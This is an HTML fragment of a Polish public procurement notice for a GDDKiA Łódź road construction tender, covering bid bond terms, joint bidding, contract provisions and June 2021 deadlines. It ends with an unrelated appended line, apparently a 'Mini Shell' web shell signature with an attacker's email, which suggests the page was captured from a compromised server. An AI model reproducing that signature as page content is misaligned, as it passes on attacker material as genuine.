dotyczące wadium: </h3> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości 90.000,00 zł<br/>(słownie: dziewięćdziesiąt tysięcy złotych 00/100). 2. Wadium musi być wniesione przed<br/>upływem terminu składania ofert w jednej lub kilku następujących formach wymienionych w art.<br/>97 ust. 7 ustawy Pzp, w zależności od wyboru Wykonawcy.3. Jeżeli wadium jest wnoszone w<br/>formie gwarancji lub poręczenia Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub<br/>poręczenia w postaci elektronicznej. Wadium w takie musi obejmować cały okres związania<br/>ofertą. Treść gwarancji lub poręczenia nie może zawierać postanowień uzależniających jego<br/>dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do gwaranta. Jako<br/>Beneficjenta wadium wnoszonego w formie poręczeń lub gwarancji należy wskazać – „Skarb<br/>Państwa –Generalny Dyrektor Dróg Krajowych i Autostrad w zakresie działalności Generalnej<br/>Dyrekcji Dróg Krajowych i Autostrad Oddział w Łodzi, ul. Irysowa 2, 91-857 Łódź” W przypadku<br/>wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub<br/>poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium<br/>przez Wykonawcę, określone w art. 98 ust. 6 ustawy Pzp. Gwarancja lub poręczenie musi<br/>zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do<br/>zapłaty na rzecz Zamawiającego kwoty wadium płatne na pierwsze pisemne żądanie<br/>Zamawiającego. Gwarancja lub poręczenie musi zawierać w swojej treści wskazanie adresu e-mail lub adresu pocztowego, na który Zamawiający prześle oświadczenie o zwolnieniu wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy<br/>Pzp,orazart.109 ust. 1 pkt 10 ustawy Pzp, natomiast spełnianie warunków udziału w<br/>postępowaniu Wykonawcy wykazują zgodnie z pkt 8.2. IDW (Tom I SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy oraz warunki wprowadzenia zmian zostały określone w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty powinny by złożone za pośrednictwem Platformy zakupowej https:// gddkia.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wraz z Ofertą Wykonawca zobowiązany jest złożyć za pośrednictwem Platformy: 1) odpis<br/>lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w<br/>Formularzu Oferty wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do<br/>Wykonawcy. Wykonawcy wspólnie ubiegającego się o zamówienie, jak również w odniesieniu do<br/>podmiotów udostępniających zasoby; w przypadku wskazania przez Wykonawcę dostępności<br/>ww. dokumentów pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych<br/>baz Ogłoszenie nr z dnia Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu -<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty<br/>budowlane danych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na<br/>język polski pobranych samodzielnie przez Zamawiającego dokumentów . 2) pełnomocnictwo lub<br/>inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotu<br/>udostępniającego zasoby chyba, że umocowanie do reprezentacji wynika z dokumentów, o<br/>których mowa w pkt. 16.6. ppkt 1) IDW (TOM I SWZ); 3) pełnomocnictwo lubinny dokument<br/>potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu). Pełnomocnik może być<br/>ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy; 4) oryginał gwarancji lub poręczenia, jeśli wadium wnoszone<br/>jest w innej formie niż pieniądz, z uwzględnieniem postanowień pkt. 18.3.IDW (TOM I SWZ);<br/>5)zobowiązania wymagane postanowieniami pkt. 11.3. IDW (TOM I SWZ), w przypadku gdy<br/>Wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu wraz z pełnomocnictwami, jeżeli prawo do<br/>podpisania danego zobowiązania nie wynika z dokumentów, o których mowa w pkt.16.6. ppkt 1)<br/>IDW (TOM I SWZ); 6) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, o którym mowa w art. 117 ust. 4 ustawy Pzp; 7) oświadczenie wymagane<br/>postanowieniami pkt. 10.2., 11.9. i 13.3. IDW (TOM I SWZ).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com